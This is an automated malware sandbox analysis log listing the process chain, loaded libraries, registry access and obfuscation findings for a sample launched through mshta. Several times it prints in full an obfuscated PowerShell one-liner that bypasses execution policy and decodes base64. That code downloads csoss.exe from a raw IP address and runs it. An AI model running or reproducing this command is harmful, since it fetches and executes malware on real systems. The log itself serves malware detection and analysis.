                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.pdb source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
